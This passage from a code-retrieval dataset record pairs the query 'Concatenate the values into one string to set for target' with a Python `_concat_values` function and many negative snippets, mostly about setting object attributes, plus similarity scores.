[],\n 'images': [],\n 'departments': [],\n 'website': None,\n 'sqft': None,\n 'calendar': None,\n 'campus': None,\n 'girCount': None,\n 'girLimit': False,\n 'girLocations': None,\n 'synonyms': [],\n 'bldgId': None,\n 'parkingZoneGroup': None,\n 'propId': None,\n 'adaParkingSpaceCount': None,\n 'motorcycleParkingSpaceCount': None,\n 'evParkingSpaceCount': None,\n 'weeklyMenu': None,\n 'notes': None,\n 'labels': {},\n 'steward': None,\n 'shape': {}\n }", "def add_attributes(data, **kwargs):\n for key in kwargs:\n data[key] = kwargs[key]", "def __init__(self, **kwargs):\n \n default_attr = dict(username='')\n\n allowed_attr = list(default_attr)\n default_attr.update(kwargs)\n\n for key in default_attr:\n if key in allowed_attr:\n self.__dict__[key] = default_attr.get(key)", "def __init__(self, **kwargs):\n # loop over the given kwargs\n for key, value in kwargs.items():\n # treat them like attribute assignments\n setattr(self, key, value)", "def set_attributes(self, new_attributes=None):\n self.attributes = new_attributes", "def _yamlSetAttributes(self, attributes):\n extra = dict([(key, value)\n for key, value in attributes.items()\n if key not in self._yamlAttributeKeys])\n self._preservedExtraAttributes.update(extra)\n\n keys = [key for key in attributes.keys()\n if (key in self._yamlAttributeKeys)\n and (key not in self._yamlSpeciallyHandledAttributes)]\n for key in keys:\n setattr(self, key, attributes[key])", "def set_attrs(self, **kwargs) -> None:\n self._obj.coords[GEO_MAP_COORD].attrs.update(**kwargs)", "def _init_node_attributes(self):\n assert False", "def _setAttributes(self, reactor, done):\n self.reactor = reactor\n self._done = done", "def _set_attributes(self, model):\n\n if model:\n self._get_dict(model)", "def __init__(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)", "def _setAttributes(self, primaryAttr, attrs):\n return False", "def __attrs_post_init__(self):", "def test_default_attributes_set_in_init(self):\n\n x = BaseTransformer()\n\n expected_attributes = {\n \"version_\": tubular._version.__version__,\n \"verbose\": False,\n \"columns\": None,\n \"copy\": True,\n }\n\n h.test_object_attributes(\n obj=x,\n expected_attributes=expected_attributes,\n msg=\"Default attributes set in init\",\n )", "def fill(self, **kwargs):\r\n for name in kwargs.keys():\r\n setattr(self, name, kwargs[name])\r\n return self", "def __init__(self, **kwargs):\n for key, val in kwargs.items():\n setattr(self, key, val)", "def __init__(self, **kwargs):\n for key, val in kwargs.items():\n setattr(self, key, val)", "def __init__(self, **kwargs):\n for key, val in kwargs.items():\n setattr(self, key, val)", "def initAttributes(self):\n CCSDS.DU.DataUnit.initAttributes(self)\n self.dataFieldHeaderFlag = 0\n self.setPacketLength()", "def __init__(self, **kwargs: Any):\n for name, value in kwargs.items():\n setattr(self, name, value)", "def __init__(self, *args, **kwargs):\n super(AttrDict, self).__init__(*args, **kwargs)\n self.__dict__ = self", "def __init__( self, **kwargs ):\n self.__dict__.update( kwargs )", "def setAttributes(self, args):\n for atr in self.defaultAttributes:\n if args.has_key(atr):\n # convert atr to proper type\n objAttr = getattr(self, atr)\n myType = type(args[atr])\n if type(objAttr) == types.IntType and myType <> types.IntType:\n args[atr] = int(args[atr])\n elif type(objAttr) == types.StringType and myType <> types.StringType:\n args[atr] = str(args[atr])\n elif type(objAttr) == types.ListType and myType <> types.ListType:\n args[atr] = eval(args[atr])\n elif type(objAttr) == types.DictType and myType <> types.DictType:\n args[atr] = eval(args[atr])\n elif type(objAttr) == types.FloatType and myType <> types.FloatType:\n args[atr] = float(args[atr])\n setattr(self, atr, args[atr])", "def set_attributes(self):\n\n self.input_file = None # the InputFile object\n self.namelist = None # the currently selected namelist\n self.file_loaded = False # is an input file loaded or not", "def _setAttribs(self, attribs):\n if attribs:\n # force the state\n self.states.enable('harvested')\n self.__attribs = []\n for i, attrib in enumerate(attribs):\n if isinstance(attrib, dict):\n if not 'name' in attrib:\n raise ValueError, \\\n \"Harvestable: attribute must be a string or \" + \\\n \"a dictionary with 'name'\"\n else:\n attrib = {'name': attrib}\n\n # assign default method to copy\n if not 'copy' in attrib:\n attrib['copy'] = self.__copy_attribs\n\n # check copy method\n if not attrib['copy'] in self._KNOWN_COPY_METHODS:\n raise ValueError, \"Unknown method %s. Known are %s\" % \\\n (attrib['copy'], self._KNOWN_COPY_METHODS)\n\n if not ('obj' in attrib or 'attr' in attrib):\n # Process the item to harvest\n # split into obj, attr. If obj is empty, then assume self\n split = attrib['name'].split('.', 1)\n if len(split)==1:\n obj, attr = split[0], None\n else:\n obj, attr = split\n attrib.update({'obj':obj, 'attr':attr})\n\n if attrib['obj'] == '':\n attrib['obj'] = 'self'\n\n # TODO: may be enabling of the states??\n\n self.__attribs.append(attrib) # place value back\n else:\n # just to make sure it is not None or 0\n self.__attribs = []", "def __setstate__(self,values):\n self.initDefault()\n setter = object.__setattr__\n for value,attr in zip(values,self.persistent):\n setter(self,attr,value)\n if self.dirty_sizeCrc == None:\n self.dirty_sizeCrc = {} #--Use empty dict instead.\n self.refreshDataSizeCrc()", "def set_attributes(self):\n s = _setter(oself=self, e1=NameError, e2=AttributeError)\n\n s('oself.coef_ = oself.model.coef_')\n s('oself.intercept_ = oself.model.intercept_')\n\n self.time_prepare = None\n s('oself.time_prepare = oself.model.time_prepare')\n self.time_upload_data = None\n s('oself.time_upload_data = oself.model.time_upload_data')\n self.time_fitonly = None\n s('oself.time_fitonly = oself.model.time_fitonly')", "def __init__(self, **kwargs):\n super(Model, self).__init__(**kwargs)\n\n for (key, value) in kwargs.iteritems():\n # use setattr so that validation is triggered\n setattr(self, key, value)", "def __init__(self, attrs: Dict[str, Any]) -> None:\n self.attrs = attrs", "def set_params(self,**kwargs):\n for key in kwargs:\n setattr(self, key, kwargs[key])", "def __init__(self,**kwargs):\n self.attr = ['angle','width','height','m','Fg','Fs','Fd','kf','Ff']\n # attributes of the incline in order: angle,width,height, mass,Fg(gravity force),Fs(statical force), Fd (dynamical force),kf(friction coefficient), Ff(friction force)\n self.data = {param: None for param in self.attr}#initialazing data\n self.given_data = set() #set of data given by user\n self.add_data(**kwargs)", "def assign_values(self, data):\n\n for key in self.__dict__.keys():\n if key in data.keys():\n setattr(self, key, data[key]) # handy built-in function", "def set_initial_values(self):\n\n pass", "def set_attr_values(self):\n ats = self.attributes # convenient short name\n for aid in ats:\n value = ats[aid]['nv'] if 'nv' in ats[aid] else (\n ats[aid]['value'] if 'value' in ats[aid] else None)\n if value is not None:\n# self.h5node.attrs[aid] = value\n #- self.file.file_pointer[self.full_path].attrs[aid] = value\n self.file.set_attribute(self.full_path, aid, value)\n #- self.file.h5save_attribute(self.full_path, aid, value)\n #- self.file.h5commands.append(\"set attribute(%s:%s)-%s\" % (self.full_path,\n #- aid, value))", "def __init__(self, data={}):\n self._update_(data)", "def initArgs(self, args):\n ignore = ['self', 'kwargs', 'args']\n for k,v in args.iteritems():\n if k not in ignore: \n setattr(self, k, v)\n pass", "def set_attributes(self, attributes: typing.Dict[str, types.AttributeValue]) -> None:\n if not attributes:\n return\n for key, value in attributes.items():\n self.set_attribute(key, value)", "def _update_attributes(self, data):\n self._set_avatar(data)\n self.boosts_since = parse_boosts_since(data)\n self.flags = parse_flags(data)\n self.nick = parse_nick(data)\n self.pending = parse_pending(data)\n self.role_ids = parse_role_ids(data)\n self.timed_out_until = parse_timed_out_until(data)", "def attributes(self, attributes):\n\n self._attributes = attributes", "def attributes(self, attributes):\n\n self._attributes = attributes", "def __init__(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)", "def setattrs(self, data, attrlist, id_array=None):\n\t\tassert len(data) == len(attrlist)\n\t\tfor d, attr in zip(data, attrlist):\n\t\t\tif id_array == None: setattr(self, attr, d)\n\t\t\telse:getattr(self, attr)[id_array] = d # Setting 1d array elements", "def set_table_attributes(self, attributes):\n self._dirty = True\n if attributes is not None:\n for k, v in attributes.iteritems():\n _key_guard(k, 'Attribute name')\n _str_guard(v, 'Attribute value')\n self._attributes = attributes", "def update(self, **data):\n for attribute in data:\n if hasattr(self, attribute):\n setattr(self, attribute, data[attribute])\n if \"password\" in data:\n self.password = data[\"password\"]", "def read_attributes(self, dataset):\n if 'attributes' in self.configs:\n for key, value in self.configs['attributes'].items():\n setattr(dataset, key, value)", "def __init__(self, **kwargs):\n self.__dict__.update(kwargs)", "def __init__(self, **kwargs):\n self.__dict__.update(kwargs)", "def _set_attrs(ds, **attrs_map):\n for key in attrs_map:\n val = attrs_map[key] # Use Python 2/3 agnostic style\n ds.attrs[key] = val", "def initobj(obj, attrs):\n for a in obj.InstAttr:\n if a != 'id' and a in attrs:\n setattr(obj, a, attrs[a])", "def initobj(obj, attrs):\n for a in obj.InstAttr:\n if a != 'id' and a in attrs:\n setattr(obj, a, attrs[a])", "def set_properties(struct):", "def __extract_common_attrs(self, raw_data: Dict) -> None:\n for attr in self.COMMON_ATTRS:\n if attr not in self.ATTRS and attr in raw_data:\n setattr(self, attr, raw_data[attr])", "def _set_default_attributes(self):\n # Default input attributes\n self._has_studio_override = False\n self._had_studio_override = False\n\n self._is_overriden = False\n self._was_overriden = False\n\n self._is_modified = False\n self._is_invalid = False\n\n self._is_nullable = False\n self._as_widget = False\n self._is_group = False\n\n # If value should be stored to environments\n self._env_group_key = None\n\n self._any_parent_as_widget = None\n self._any_parent_is_group = None\n\n # Parent input\n self._parent = None\n\n # States of inputs\n self._state = None\n self._child_state = None\n\n # Attributes where values are stored\n self.default_value = NOT_SET\n self.studio_value = NOT_SET\n self.override_value = NOT_SET\n\n # Log object\n self._log = None\n\n # Only for develop mode\n self.defaults_not_set = False", "def set_data(data, create_attrs=True, set_values=True, set_values_on_all=False, verbose=True):\n\n def set_value(node, attr, attr_data, verbose=False):\n \"\"\"Sets the value on specifed node from data \"\"\"\n\n keyable = attr_data.get('keyable')\n non_keyable = attr_data.get('non_keyable')\n value = attr_data.get('value')\n attr_type = attr_data.get('type')\n\n excluded_types = ['float2', 'float3', 'double2', 'double3',\n 'compound', 'message', 'short3', 'long2', 'long3']\n try:\n if not mc.objExists(node+'.'+attr):\n if verbose:\n mc.warning('# Attr {0}.{1} doe not exist! Skipping..'.format(node, attr))\n return\n\n elif attr_type in excluded_types:\n return\n\n elif attr_type == 'string':\n if not value:\n value = ''\n mc.setAttr(node+'.'+attr, value, type='string')\n\n else:\n mc.setAttr(node+'.'+attr, value)\n\n if verbose:\n print 'Set attribute value: '+node+'.'+attr\n\n except:\n if verbose:\n mc.warning('Could not set '+attr_type+' attr value :'+node+'.'+attr)\n\n def add_attr(node, attr, attr_data, verbose=False):\n \"\"\"Actually add the attribbutes based on attr_dataDict\"\"\"\n\n parent = attr_data.get('parent')\n keyable = attr_data.get('keyable')\n non_keyable = attr_data.get('non_keyable')\n value = attr_data.get('value')\n attr_type = attr_data.get('type')\n\n # get parent and make sure it is a string\n if parent and type(parent) is list:\n parent = parent[0]\n\n # skip if the attr already exists\n if mc.objExists(node+'.'+attr):\n if verbose:\n mc.warning('# Attr {0}.{1} already exists! Skipping..'.format(node, attr))\n return\n\n # add message attrs\n elif attr_type == 'message':\n mc.addAttr(node, ln=attr, at='message')\n\n if verbose:\n print 'Added attribute: '+node+'.'+attr\n return True\n\n # add compound attrs\n elif attr_type == 'compound':\n number_children = attr_data.get('number_children')\n\n try:\n if parent:\n mc.addAttr(node, ln=attr, at='compound', p=parent, k=keyable, number_children=number_children)\n else:\n mc.addAttr(node, ln=attr, at='compound', k=keyable, number_children=number_children)\n\n if verbose:\n print 'Added attribute: '+node+'.'+attr\n return True\n\n except:\n mc.warning('# Could not add attr: {0}.{1}'.format(node, attr))\n\n # add string attrs\n elif attr_type == 'string' :\n try:\n if parent:\n mc.addAttr(node, ln=attr, dt='string',p=parent)\n else:\n mc.addAttr(node, ln=attr, dt='string')\n\n if verbose:\n print 'Added attribute: '+node+'.'+attr\n return True\n\n except:\n mc.warning('# Could not add attr: {0}.{1}'.format(node, attr))\n\n # add enum attrs\n elif attr_type == 'enum':\n try:\n enum = attr_data.get('enum')\n default_value = attr_data.get('default_value')\n\n if parent:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable, en=enum, p=parent)\n else:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable, en=enum)\n\n if verbose:\n print 'Added attribute: '+node+'.'+attr\n return True\n\n except:\n mc.warning('# Could not add attr: {0}.{1}'.format(node, attr))\n\n\n elif attr_type == 'bool':\n try:\n default_value = attr_data.get('default_value') or 0\n if parent:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable, dv=default_value, p=parent)\n else:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable, dv=default_value)\n\n if verbose:\n print 'Added attribute: '+node+'.'+attr\n return True\n\n except:\n mc.warning('# Could not add attr: {0}.{1}'.format(node, attr))\n\n elif attr_type in ['float2', 'float3', 'double2', 'double3', 'short3', 'long2', 'long3']:\n try:\n if parent:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable, p=parent)\n else:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable)\n\n if verbose:\n print 'Added attribute: '+node+'.'+attr\n return True\n\n except:\n mc.warning('# Could not add attr: {0}.{1}'.format(node, attr))\n\n else:\n try:\n min_value = attr_data.get('min')\n max_value = attr_data.get('max')\n default_value = attr_data.get('default_value') or 0\n\n if parent:\n if min_value and max_value:\n mc.addAttr(node, ln=attr, min=min_value, max=max_value, at=attr_type, k=keyable, dv=default_value, p=parent)\n elif min_value:\n mc.addAttr(node, ln=attr, min=min_value, at=attr_type, k=keyable, dv=default_value, p=parent)\n elif max_value:\n mc.addAttr(node, ln=attr, max=max_value, at=attr_type, k=keyable, dv=default_value, p=parent)\n else:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable, dv=default_value, p=parent)\n else:\n if min_value is not None and max_value is not None:\n mc.addAttr(node, ln=attr, min=min_value, max=max_value, at=attr_type, k=keyable, dv=default_value)\n elif min_value:\n mc.addAttr(node, ln=attr, min=min_value, at=attr_type, k=keyable, dv=default_value)\n elif max_value:\n mc.addAttr(node, ln=attr, max=max_value, at=attr_type, k=keyable, dv=default_value)\n else:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable, dv=default_value)\n\n if verbose:\n print 'Added attribute: '+node+'.'+attr\n return True\n\n except:\n mc.warning('# Could not add attr: {0}.{1}'.format(node, attr))\n\n nodes = mc.ls(data.keys())\n\n # first create all compound and child attrs\n if not data:\n return\n\n for node in nodes:\n if verbose:\n print '\\n'\n\n node_data = data.get(node)\n if not node_data:\n continue\n\n node_data = node_data.get('data')\n ordered_attr_list = data.get(node).get('attr_order')\n\n # this is for only setting vcalues on newly created nodes\n # we doint want ot mess with whats already there.\n set_values_for = []\n\n # first create attrs\n if create_attrs:\n for attr in ordered_attr_list:\n attr_data = node_data.get(attr)\n result = add_attr(node, attr, attr_data, verbose=verbose)\n if result:\n set_values_for.append(attr)\n\n if set_values_on_all:\n set_values_for = ordered_attr_list\n\n # then set them\n for attr in set_values_for:\n attr_data = node_data.get(attr)\n set_value(node, attr, attr_data, verbose=verbose)", "def _set_conf_attrs():\n\tdebug_msg = \"initializing the configuration\"\n\tlogger.debug(debug_msg)", "def store_attrs(self, attrs):\n self.get_attr().SetObject(dumps(attrs), False)", "def part(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)", "def __init__(self, **kwargs):\n # TODO: see if i can remove keyword args\n super().__init__()\n self._updateData = {}", "def __init__(self, data):\n # add play_guid as it sometimes doesn't exist\n if 'play_guid' not in data:\n data['play_guid'] = ''\n # loop through data\n for x in data:\n # set information as correct data type\n mlbgame.object.setobjattr(self, x, data[x])", "def initAttributes(self):\n Packet.initAttributes(self)\n self.packetType = TM_PACKET_TYPE", "def _set_attributes_from_dict(self, attrib_names, default_attribs={},\n custom_attrib={}):\n for attr_name in attrib_names:\n if attr_name in custom_attrib:\n attr_val = custom_attrib[attr_name]\n elif attr_name in default_attribs:\n attr_val = default_attribs[attr_name]\n else:\n raise ValueError(\n \"Neither a custom nor a default value is given for the requried attribute {}\".format(\n attr_name))\n\n setattr(self, attr_name, attr_val)", "def __init__(self, **kwds ):\n super(Model, self).__init__()\n self.__key = None \n for name, value in kwds.items():\n self[name] = value", "def update(self, *args, **kwargs):\n if args is not () and args is not None:\n attr_names = [\"id\", \"size\", \"x\", \"y\"]\n for index, attr in enumerate(args):\n setattr(self, attr_names[index], attr)\n else:\n for key, value in kwargs.items():\n if hasattr(self, key):\n setattr(self, key, value)", "def set_attributes(object, attributes):\n for name, attribute in attributes.items():\n setattr(object, name, attribute)", "def __attrs_post_init__(self):\n\n self.jobdate = parse(to_str(self.jobdate).strip())\n self.vehicleid = to_str(self.vehicleid).strip()\n self.reason = to_str(self.reason).strip()\n self.notes = to_str(self.notes).strip()\n self.costparts = Decimal(to_str(self.costparts).strip())\n self.costlabor = Decimal(to_str(self.costlabor).strip())\n self.costtotal = Decimal(to_str(self.costtotal).strip())\n\n # Apply additional data transformations\n self.yearmon = datetime.strftime(self.jobdate, '%Y-%m')", "def __setstate__(self, statedict):\n for k, v in list(statedict.items()):\n setattr(self, k, v)", "def __setstate__(self, statedict):\n for k, v in list(statedict.items()):\n setattr(self, k, v)", "def __init_values(self, values):\n for name, value in list(values.items()):\n if name in initializable_parameters:\n setattr(self, name, value)", "def __init__(self, raw_data: Dict) -> None:\n self.raw_data = raw_data\n self.__extract_common_attrs(raw_data)\n\n # Fetch data with DATA_KEY or simply use the initial data.\n # In some cases the DATA_KEY is the same as the object attribute.\n # For example:\n # \"comments\": [{\n # \"comment_id\": 44444,\n # \"comment\": \"Hello, world!\"\n # }]\n # This object has a `comment` attribute but its DATA_KEY is also `comment`:\n # \"comment\": {\"comment_id\": 44444,\n # \"key_id\": 12345,\n # \"comment\": \"This is a test.\"}\n # This is an edge case happening only twice, so to overcome it\n # just check the value type under the given key.\n if self.DATA_KEY in raw_data and \\\n (isinstance(raw_data[self.DATA_KEY], dict)):\n data = raw_data[self.DATA_KEY]\n else:\n data = raw_data\n\n for attr in self.ATTRS:\n setattr(self, attr, data.get(attr, None))", "def _initial_setup(self, **train_kwargs):\n self._update(time_step=0., **train_kwargs)", "def update_from_kwargs(self, **kwargs):\n for (key, value) in kwargs.items():\n setattr(self, key, value)", "def _init(self, **kwds):\n name = kwds.get('name')\n if name and not self.data.has_key('name'):\n self.set_name(name)\n self.characterID = kwds.get('characterID', None)\n self.myName = kwds.get('myName', u'')", "def initDefaults(self, kwargs):\n \n for k,v in self.defaults.iteritems():\n if k in kwargs: # use assigned values\n setattr(self, k, kwargs[k])\n else: # use default values\n setattr(self, k, v)\n \n for k,v in kwargs.iteritems():\n if k not in self.defaults:\n setattr(self, k, v)\n pass", "def set_attributes(self, settings):\n\n for key, value in settings.items():\n self.__dict__[key] = value", "def __init__(self):\n self.relation = ''\n self.attributes = []\n self.attribute_types = dict()\n self.attribute_data = dict()\n self.comment = []\n self.data = []\n pass", "def prepare_data(self):", "def __init__(self, *args, **kwargs):\n self.update(*args, **kwargs)", "def add_attributes(self, attributes):\n self.attributes = dict(self.attributes, **attributes)", "def AssignAttributes(self, attr):\r\n \r\n self.SetAttributes(attr)\r\n self._ownsAttr = True", "def set_properties(self):\n\n # assign feed entries from the root of the parsed data\n if hasattr(self.parsed_data, \"entries\"):\n self.items = self.parsed_data.entries\n\n # check if it is a feed root or feed element\n if hasattr(self.parsed_data, \"feed\"):\n source_data = self.parsed_data.feed\n else:\n source_data = self.parsed_data\n\n # assign available properties not listed in keymap\n self.title = source_data.title\n self.link = source_data.link\n\n for key in self.parsed_data.keymap.keys():\n if hasattr(self, key) and not getattr(self, key):\n attr_value = source_data.get(key)\n if isinstance(attr_value, struct_time):\n attr_value = self.serialize_datetime(attr_value)\n\n setattr(self, key, attr_value)", "def _load_attrs(self) -> None:\n self.attr_ids.clear()\n for attr_label, attr_value in self.element.attr.items():\n self.add_attr(None, attr_label, attr_value)\n self._update_attr_list()", "def __setattr__(self, name, value):\n if not self.__dict__.has_key('_initialised'): # this test allows attributes to be set in the __init__ method\n return dict.__setattr__(self, name, value)\n elif name in self: # any normal attributes are handled normally\n dict.__setattr__(self, name, value)\n else:\n self.__setitem__(name, value)" ]
[ "0.79411536", "0.7760498", "0.74538267", "0.73853767", "0.7362866", "0.71887094", "0.7146371", "0.7146371", "0.7146371", "0.7098289", "0.70153654", "0.699478", "0.69330215", "0.68741333", "0.68410134", "0.6835195", "0.673314", "0.67293113", "0.66948265", "0.6694178", "0.66822034", "0.66728437", "0.6655597", "0.66395026", "0.6635546", "0.6632001", "0.6627901", "0.66025656", "0.65755033", "0.6516347", "0.6506727", "0.64954156", "0.64901596", "0.6488747", "0.6488747", "0.6488747", "0.6476487", "0.6475202", "0.646804", "0.64663374", "0.6460597", "0.6447797", "0.64392143", "0.6433127", "0.6422097", "0.64182806", "0.64045393", "0.63996905", "0.63785094", "0.6370708", "0.6369225", "0.6368802", "0.6361304", "0.63525283", "0.6338941", "0.63358533", "0.6332958", "0.6332958", "0.63086164", "0.62849367", "0.6275123", "0.62615484", "0.6251924", "0.6246777", "0.6246777", "0.62417144", "0.622231", "0.622231", "0.62183267", "0.6218167", "0.62095976", "0.62062335", "0.6202282", "0.61993617", "0.61922044", "0.618667", "0.6174047", "0.6167156", "0.61308205", "0.6112932", "0.6111885", "0.61048234", "0.60988504", "0.6095748", "0.6095748", "0.6090265", "0.6082952", "0.6071768", "0.60690147", "0.6058394", "0.60532767", "0.6049961", "0.6049184", "0.60272646", "0.6024787", "0.6019378", "0.6017795", "0.6010953", "0.60072666", "0.59935224" ]
0.6589023
28
Concatenate the values into one string to set for target.
def _concat_values(concat_columns, column_values, delimiter): # Use the order of values that we got from concat_columns def. values = [ column_values[item] for item in concat_columns if item in column_values ] return delimiter.join(values) or None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def concat(values, sep=', '):\n concat_str = None\n try:\n concat_str = sep.join([str(v) for v in values if not is_empty(v)])\n except Exception as e:\n pass\n return concat_str", "def joined_parameter(*values: str) -> str:\n return \"+\".join(values)", "def _concat(self, *args, **kwargs):\n values = list(args)\n output = []\n for value in values:\n if not isinstance(value, (str, basestring)):\n value = unicode(value)\n else:\n value = unicode(value)\n value = value.strip()\n output.append(value)\n output = kwargs[\"delimiter\"].join(output)\n output = unicode(output)\n return output", "def join_path(values: t.List[str]) -> str:\n from axonius_api_client.tools import listify\n\n return \" => \".join(listify(values))", "def __str__(self):\n return f'[{\"\".join(str(val) + \", \" for val in self)[:-2]}]'", "def join(self, values):\n values = [self.unpack(v) for v in ensure_list(values)]\n return self.pack(values)", "def __str__(self):\n s = ''\n for v in self:\n s = ''.join([s, ',' if s else '', str(v)])\n return s", "def __str__(self):\n return \"{%s}\" % \", \".join(str(x) for x in self)", "def concatenate_data():", "def __str__(self):\n return \"%s(%s)\" % (self[0], \", \".join(map(str, self[1:])))", "def __str__(self):\n return \"{0} {1}\".format(self.operation, \", \".join([v for v in [self.operand0, self.operand1, self.operand2] if v is not None]))", "def __str__(self):\n return ''.join(self)", "def RSet(var, value):\n return \" \" * (len(var) - len(value)) + value[:len(var)]", "def combine_copy_options(copy_options):\n return \" \".join(copy_options)", "def implicit_cat(values):\n values = [value for value in values if value is not None]\n if len(values) == 0:\n return None\n if len(values) == 1:\n return values[0]\n return \"\".join(str(value) for value in values)", "def str(self) -> str:\n return \"\".join(self)", "def _str_targets(self):\n def _slice_to_str(obj):\n if isinstance(obj, slice):\n start = \"\" if obj.start is None else str(obj.start.__index__())\n stop = \"\" if obj.stop is None else str(obj.stop.__index__())\n if obj.step is None:\n return f\"{start}:{stop}\"\n else:\n step = str(obj.step.__index__())\n return f\"{start}:{stop}:{step}\"\n else:\n return obj.__index__()\n\n if isinstance(self.targets, tuple):\n return f\"[{', '.join(_slice_to_str(idx for idx in self.targets))}]\"\n else:\n return f\"[{_slice_to_str(self.targets)}]\"", "def concatena(*args):\n linea = ''\n for l in args:\n linea += str(l if l else '')\n return linea", "def concatenate_observation_data(\n self, compartment, date, measurementmethod, orig_srid, origx, origy,\n parameter, property, quality, sampledevice, samplemethod, unit, value,\n ):\n # Convert to string before joining\n data = map(str, [\n compartment, date, measurementmethod, orig_srid, origx, origy,\n parameter, property, quality, sampledevice, samplemethod, unit,\n value\n ])\n return ''.join(data)", "def join_with_and(values, last_word: str = 'and') -> str:\n valuesList = list(values)\n length = len(valuesList)\n\n # value1, value2, value3 and value4\n if length > 2:\n return '{} {} {}'.format(', '.join(valuesList[:-1]), last_word, valuesList[-1])\n # value1 and value2\n elif length == 2:\n return '{} {} {}'.format(valuesList[0], last_word, valuesList[1])\n # value 1\n elif length == 1:\n return valuesList[0]\n # Empty\n return ''", "def __str__(self):\n return ' '.join([self.source, self.name, str(self.outputs)])", "def __str__(self):\n \n return reduce(lambda a,b : str(a)+str(b),self.list)", "def format_inputs_outputs(self, values):\n return ', '.join('%s=%s' % (key, value)\n for key, value in sorted(values.iteritems()))", "def join_with_or(values) -> str:\n return join_with_and(values, 'or')", "def __str__(self):\n left = ''\n right = ''\n for i in range(len(self.ant)):\n left += Prop.__str__(self.ant[i]) + \", \"\n \n for i in range(len(self.con)):\n right += Prop.__str__(self.con[i]) + \", \"\n return left[:-2] + '|-- ' + right[:-2]", "def extend_result(val):\n if isinstance(val, list):\n return ','.join(val)\n return val", "def _build_summary(\n val1: str | None = None, val2: str | None = None, val3: str | None = None\n ) -> str:\n return ' : '.join([value for value in [val1, val2, val3] if value is not None])", "def _to_string(self):\r\n parts = []\r\n if self.offering:\r\n parts.extend([self.org, self.offering])\r\n if self.branch:\r\n parts.append(u\"{prefix}+{branch}\".format(prefix=self.BRANCH_PREFIX, branch=self.branch))\r\n if self.version_guid:\r\n parts.append(u\"{prefix}+{guid}\".format(prefix=self.VERSION_PREFIX, guid=self.version_guid))\r\n return u\"+\".join(parts)", "def _assemble(self):\n setexpr = ', '.join(\n f'{name} = %({name})s'\n for name in self._valueskw\n )\n froms = 'from ' + ', '.join(self._tables) if self._tables else ''\n kw = self._kw.copy()\n wheres, wkw = self._build_where()\n kw.update(wkw)\n kw.update(self._valueskw)\n return (\n f'update {self._table} '\n f'set {setexpr} '\n f'{froms} '\n f'{wheres}'\n ), kw", "def __str__(self):\n return ', '.join(str(item) for item in self._data)", "def join(self, iterable) -> String:\n pass", "def _get_const_str(self):\n const_components = []\n for k, v in self.constargs.items():\n v_str = f\"'{v}'\" if type(v) is str else str(v)\n const_components.append(f\"{k}={v_str}\")\n return \",\".join(const_components)", "def join_strings(self):\n\n self.__corpora = [' ' + ' '.join(strings) + ' ' for strings in self.__corpora]", "def concat_all(self):\n return self.merge(1)", "def valueToString():", "def compose(self):\r\n return_str = \"\\t\".join([\r\n self.seqid,\r\n self.source,\r\n self.type,\r\n str(self.start),\r\n str(self.end),\r\n self.score,\r\n self.strand,\r\n self.phase,\r\n self.attributes.compose()\r\n ])\r\n return return_str", "def array_to_concatenated_string(array):\r\n return \",\".join(str(x) for x in array)", "def f_val_to_str(self):\n\n resstrlist = []\n strlen = 0\n\n for key in self._data:\n val = self._data[key]\n resstr = \"%s=%s, \" % (key, repr(val))\n resstrlist.append(resstr)\n\n strlen += len(resstr)\n if strlen > pypetconstants.HDF5_STRCOL_MAX_VALUE_LENGTH:\n break\n\n return_string = \"\".join(resstrlist)\n if len(return_string) > pypetconstants.HDF5_STRCOL_MAX_VALUE_LENGTH:\n return_string = (\n return_string[0 : pypetconstants.HDF5_STRCOL_MAX_VALUE_LENGTH - 3]\n + \"...\"\n )\n else:\n return_string = return_string[0:-2] # Delete the last `, `\n\n return return_string", "def LSet(var, value):\n return value[:len(var)] + \" \" * (len(var) - len(value))", "def flatten(self):\n if len(self.children) == 0:\n return self.val\n params = (',').join([ child.flatten() for child in self.children ])\n return '%s(%s)' % (self.val, params)", "def __str__(self):\n termStrings = []\n for term in self.LHS:\n coefficient = term[0]\n unknownSet = term[1]\n\n termString = str(coefficient) + ' * '\n unknownStrings = []\n for unknown in unknownSet:\n unknownString = unknown[0].__class__.__name__ + '@' + str(id(unknown[0]))[-4:] + '.' + unknown[1] # last 4 digits of variable ID . attribute name\n unknownStrings.append(unknownString)\n termString += str.join(' * ', unknownStrings)\n termStrings.append(termString)\n\n termStrings = str.join(' + ', termStrings)\n return termStrings + ' = ' + str(self.RHS)", "def concatenate_items(items, conjunction='and'):\n text = ''\n if not items:\n text = ''\n elif len(items) == 1:\n text = items[0]\n elif len(items) == 2:\n text = '{} {} {}'.format(items[0], conjunction, items[1])\n else:\n text = ', '.join(items[:-1])\n text += ', {} {}'.format(conjunction, items[-1])\n return text", "def __str__(self):\n ingredient_names = [str(ingredient) for ingredient in self.ingredients]\n return ', '.join(ingredient_names)", "def refreshAttrStr(self):\n self.attributes_str = ';'.join(['='.join(\n [attr, self.attributes[attr]]) for attr in self.attributes_order])", "def __str__(self):\n res = \"<\"\n for elem in self.values[:-1]:\n res += str(elem) + \", \"\n res += str(self.values[-1]) + \">\"\n return res", "def __str__(self):\n self.vals.sort()\n result = ''\n for e in self.vals:\n result = result + str(e) + ','\n return '{' + result[:-1] + '}'", "def concat_address_full(**kwargs):\r\n result = \"{concat_address} {city_name}, {state_code}\".format(**kwargs)\r\n if kwargs[\"five_digit_zip_code\"]:\r\n result += \" {five_digit_zip_code}\".format(**kwargs)\r\n if kwargs[\"four_digit_zip_code\"]:\r\n result += \"-{four_digit_zip_code}\".format(**kwargs)\r\n return result", "def array_to_concatenated_string(array):\n return \",\".join(str(x) for x in array)", "def str_cat(arg1, arg2):\n return str(arg1) + str(arg2)", "def __str__ (self):\n return \", \".join(str(row) for row in self.rows()).join(\"()\")", "def join_vars(self, xs):\n return tf.concat(1, xs)", "def get_string(self):\n return (self.loop_level+1) * ' ' + ','.join(map(str, self.get_list()))", "def as_str(the_val):\n if 